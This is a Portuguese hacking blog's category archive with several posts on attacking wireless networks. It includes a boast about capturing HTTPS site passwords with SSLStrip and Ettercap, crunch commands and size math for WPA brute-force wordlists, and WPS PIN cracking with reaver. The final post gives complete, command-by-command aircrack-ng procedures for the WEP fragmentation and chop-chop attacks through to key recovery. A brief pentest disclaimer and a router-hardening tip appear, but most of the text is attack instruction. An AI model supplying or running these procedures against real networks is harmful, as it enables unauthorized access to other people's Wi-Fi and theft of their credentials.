Arquivo da categoria ‘Wireless – Dark Side’

E ai pessoal…

Good news!!! Principalmente pq este é um assunto que interessa muito a vocês…

Depois de um tempo estudando e aprimorando, consegui realizar com sucesso um ataque do tipo Man In The Middle (MiTM).

As ferramentas utilizadas foram o SSLStrip e o Ettercap apenas, ambos softwares do Backtrack… Mas o que esse MiTM significa exatamente e o que da pra fazer com isso? Bom, vou responder com uma imagem… observem o usuário, senha e site da figura abaixo.

SSLSTRIP+ETTERCAP

 

Pois é! Você consegue pegar a senha de qualquer site que use https, tipo facebook, gmail, hotmail, etc. Simples assim…

Então em breve teremos mais um vídeo mostrando como fazer esse tipo de ataque!

Até logo,

Bartulihe

Um dos posts com mais acessos é o Criando uma Wordlist com o Chunch.

Também surgiram muitas dúvidas, tais como:

Quero criar uma wordlist com todas as combinações possíveis, como faço?

ou

O Backtrack trava quando tento criar uma Wordlist. Estou tentando criar uma wordlist com 10 caracteres e usando os caracteres: A-Z, a-z, 0-9, !@#$%¨&*()_

Criar uma wordlist desse porte, é possível, mas é viável? Você sabe quantas combinações serão geradas? E, mais importante, você vai ter espaço em disco para armazenar essa Wordlist?

No post de hoje irei mostrar como calcular o tamanho da Wordlist.

Para isso vamos usar um exemplo. Digamos que iremos tentar quebrar uma chave WPA que exige o mínimo de 8 caracteres. Para gerar a wordlist vamos usar todos os caracteres do alfabeto, minúsculos, e números de 0 a 9, totalizando 36 caracteres (26 + 10).

O comando para gerar tal wordlist é:

./crunch 8 8 0123456789abcdefghijklmnopqrstuvwxyz -o WPA_List.txt

ou, ainda mais simples:

./crunch 8 8 -f charset.lst lalpha-numeric -o WPA_List.txt

Parace uma wordlist simples, mas ao ver os números, você vai pensar duas vezes antes de gerá-la…

A fórumla para calcular o tamanho da wordlist é:

(x^y) * (y+1) = Tamanho em bytes, onde:

x = Número de caracteres sendo utilizados para gerar a Wordlist

y = Tamanho da Wordlist

No nosso exemplo:

(36^8)*(8+1)

Calculando:

003

25389989167104 é o tamanho da Wordlist em bytes. Podemos usar qualquer calculadora online para converter para outra escala.

004

Ou seja, a Wordlist, aparentemente simples, possui pouco mais de 23 TB!!!

Usando o chunch para gerar a wordlist na tela (ou seja, usando o comando ./crunch 8 8 -f charset.lst lalpha-numeric) e apertando CTRL+C para parar a criação da wordlist, podemos confirmar o tamanho da wordlist:

005

O Crunch informa que o tamanho da Wordlist é de 23 TB. Observe também a quantidade de combinações (linhas na wordlist), possíveis: 2.821.109.907.456. Isso é muita coisa, testar todas essas combinações levaria bastante tempo…

Nesse  site, muito bom por sinal, o autor criou um script para calcular o tamanho da wordlist. Eu peguei este script e traduzi para o Português (mantendo os créditos, obviamente). Você pode fazer o download do script traduzido clicando no link abaixo.

DOWNLOAD

http://www.4shared.com/file/jA4gndd7/crunch_size.html

Depois de salvar no diretório root, basta executá-lo utilizando o comando:

./crunch_size

Caso apareça a tela abaixo referente a permissão para executar o script, digite o seguinte comando:

chmod u+rwx crunch_size

BT5R3-2013-07-14-21-49-06

Agora é só executar o script novamente, com o comando ./crunch_size.

Wordlist_Scrip_PT-BR_001

Executando o script para o nosso exemplo:

Wordlist_Scrip_PT-BR_002

Agora você vai pensar duas vezes antes de criar uma wordlist…

Deixem seus comentários, caso tenham dúvidas ou sugestões, e se inscrevam no meu blog e no Canal do Youtube para receber por email as atualizações.

Canal do Youtube:

http://www.youtube.com/mbartulihe

Neste post eu mostro como explorar uma vulnerabilidade do WPS (WiFi Protected Setup) para quebrar senhas de redes Wireless utilizando encriptação WPA ou WPA2 e chaves PSK.

WPS é aquela funcionalidade que visa facilitar a conexão de dispositivos à redes Wireless domésticas. Alguns roteadores WiFi possuem essa feature. Com ela, você aperta um botão no roteador e tenta se conectar à rede Wireless. O roteador e a máquina trocam informações (PINs) e a máquina se autentica na rede Wireless, sem que o usuário precise digitar a senha.

Os roteadores mais modernos possuem essa feature e ela vem habilitada por default.

O que esse ataque faz é basicamente um brute force de PINs, até que o roteador “fale” a senha da rede.

Vantagens desse tipo de ataque:

A principal vantagem é a velocidade. Segundo documentação do reaver (programa utilizado para este ataque), quebrar a senha leva de 4 a 10 horas.

Nos testes que eu realizei, demorou quase 48 horas, mas ainda assim é infinitamente mais rápido do que gerar uma wordlist completa, com pelo menos 8 dígitos, incluindo caracteres maiúsculos, minúsculos, números e especiais. Sem contar que o tamanho de uma wordlist dessa é da ordem de Petabytes – mais precisamente, cerca de 50 PB.

Testar todas as senhas de uma wordlist de 5o PB levaria uma eternindade.

Outra vantagem é que não importa se a rede WiFi que está sendo atacada é protegida com uma senha fácil ou difícil, pois o brute forte é feito nos PINs e não nas senhas possíveis.

Como se proteger:

Algum roteadores permitem que a feature WPS seja desabilitada, outros não. Também é importante manter o firmware do roteador atualizado.

Segue o vídeo do tutorial. Aproveitem e se increvam no meu canal do Youtube, ajudem a divulgar o vídeo, clicando em like e cliquem na propaganda, assim eu ganho uns trocados hahaha

Olá,

Agora que temos o Backtrack instalado e a Wordlist criada, vamos realizar o Brute Force Attack!!! Apenas ressalto que a finalidade deste tutorial é a realização de Pentests (Penetration Tests) e mostrar a importância da utilização de senhas fortes. Caso tenham gostado, comentem, se inscrevam em meu canal do Youtube e favoritem o vídeo!!!

Abraços,

Bartulihe

Olá,

No primeiro post (link) instalamos o Backtrack no VMware Workstaion. Agora vamos instalar o Crunch Wordlist Generator e gerar o nosso arquivo de senhas…

No próximo post iremos usar o dicionário criado para fazer um ataque do tipo Brute Force a uma WLAN configurada com WPA2-PSK.

Abraços,

Bartulihe

Olá,

Hoje irei mostrar como realizar um ataque Brute Force em uma rede Wireless configurada com WPA ou WPA2. Para isso utilizaremos o Backtrack e o Crunch Wordlist Generator para gerar o nosso arquivo de senhas, chamado de Wordlist.

Nesta primeira parte iremos instalar o Backtrack no VmWare Workstation.

 

No próximo post iremos instalar o Crunch e gerar uma Wordlist

Abraços e até o próximo post!

Bartulihe

Aproveitando uma dúvida postada pelo Anderson, resolvi transformar a resposta em um post.

Nesse post irei falar sobre dois famosos ataques à rede Wireless utilizando encriptação WEP, os comandos destes dois ataques são muito parecidos. O primeiro é o Fragmentation Attack: aireplay-ng, seguido da opção -5. A idéia básica do Fragmentation Attack é coletar fragmentos de pacotes e “montar” um ARP utilizando o arpforge-ng ou packetforge-ng. Em seguinda realizamos o packet injection para obter respostas e incrementar o número de IVs.

Para realizar o Fragmentation Attack, inicialmente precisamos colocar a placa Wireless no modo monitor:

airmon-ng start [device]

Exemplo: airmon-ng start wlan0

Para “ouvir” todas as redes Wireless próximas:

airodump-ng [device]

Exemplo: airodump-ng mon0

Em seguida, precisamos realizar o fake authentication com o Access Point:

aireplay-ng -1 0 -a [bssid] -e [essid] [device]

Exemplo: aireplay-ng -1 0 -a 00:11:22:33:44:55 -e WiFiWirelessCert mon0

Agora sim iniciamos o Fragmentation Attack:

aireplay-ng -5 -b [bssid] [device]

Exemplo: aireplay-ng -5 -b 00:11:22:33:44:55 mon0

O próximo passo é utilizar o PacketForge:

packetforge-ng -0 -a [bssid] -h [mac] -k 255.255.255.255 -l 255.255.255.255 -y [fragment-xxxx-xxxxxx.xor] -w [file]

Exemplo: packetforge-ng -0 -a 00:11:22:33:44:55 -h 66:77:88:99:11:22 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1234-1234567.xor] -w arp-request

Precisamos agora utilizar o airodump para realizar o sniffer enquanto o packet injection é feito:

airodump-ng -c [channel] -w [file] -b [bssid] [device]

Exemplo: airodump-ng -c 6 -w WirelessCertCapture -b 00:11:22:33:44:55 mon0

Iniciar o packet injection:

aireplay-ng -2 -r [file] [device]

Exemplo: aireplay-ng -2 -r arp-request mon0

Por fim, Aircrack:

aircrack-ng -b [bssid] [file].cap

Exemplo: aircrack-ng -b 00:11:22:33:44:55 WirelessCertCapture.cap

Agora é só aguardar a contagem de IVs atingir de 30 a 80 mil e o aircrack conseguirá decifrar a chave de encriptação.

Este ataque é bastante parecido com o Chop Chop Attack. A sintaxe básica de comando para executar o Chop Chop Attack é:

airmon-ng start [device]

airodump-ng [device]

airodump-ng -c [channel] -w [file] -b [bssid] [device]

aireplay-ng -1 0 -a [bssid] -e [essid] [device]

aireplay-ng -4 -b [bssid] [device]

“Saving keystream in fragment-xxxx-xxxxxx.xor”

packetforge-ng -0 -a [bssid] -h [mac] -k 255.255.255.255 -l 255.255.255.255 -y [fragment-xxxx-xxxxxx.xor] -w [file02]

aireplay-ng -2 -r [file02] [device]

aircrack-ng -b [bssid] [file].cap

Abraços,

Bartulihe